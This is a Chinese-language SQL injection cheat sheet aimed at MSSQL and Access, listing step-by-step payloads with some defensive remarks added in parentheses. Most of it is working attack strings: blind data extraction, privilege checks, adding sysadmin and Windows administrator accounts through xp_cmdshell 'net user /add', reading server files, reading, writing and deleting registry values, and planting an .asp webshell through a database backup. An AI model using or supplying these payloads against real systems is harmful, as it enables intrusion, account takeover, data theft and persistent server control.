1.判断是否有注入 ;and 1=1 ;and 1=2
(两次请求返回的页面不同,说明参数被直接拼接进了SQL语句;根本的修复办法是改用参数化查询)
2.初步判断是否是mssql ;and user>0
3.注入参数是字符型时 'and [查询条件] and ''='
4.搜索时没过滤参数的 'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
(这里及下文的"数据库名"出现在 from 之后,实际指的是表名)
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
(检查的是网站所用数据库帐户的服务器角色和数据库角色;按最小权限原则,该帐户不应属于下列任何一个角色)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
(以下语句只有在注入点所用的数据库帐户已具备 sysadmin 一类的高权限时才会成功;xp_cmdshell 自 SQL Server 2005 起默认禁用,sp_addlogin、sp_password 已被 CREATE LOGIN / ALTER LOGIN 取代。防御上应保持 xp_cmdshell 关闭,并审计登录名、服务器角色成员和本地管理员组的变更)
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
(下列 xp_reg* 是未公开文档的扩展存储过程;加固时应确认网站所用的数据库帐户没有它们的 EXECUTE 权限)
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种:REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
(前提是数据库帐户拥有备份权限,并且 SQL Server 服务帐户对网站目录可写;防御上应让服务帐户无权写入网站目录,并监控网站目录下新出现的脚本文件)
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssql内置函数
(这些语句依靠类型转换失败时的报错信息回显结果;不向客户端输出详细的数据库错误可以切断这种回显,但不能消除注入本身)
;and (select @@version)>0 获得Windows的版本号(@@version 返回的是 SQL Server 的版本字符串,其中附带操作系统版本)
;and user_name()='dbo' 判断当前系统的连接用户是不是sa(严格说是判断当前数据库用户是否为 dbo;sa 等 sysadmin 成员在各数据库中都映射为 dbo)
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';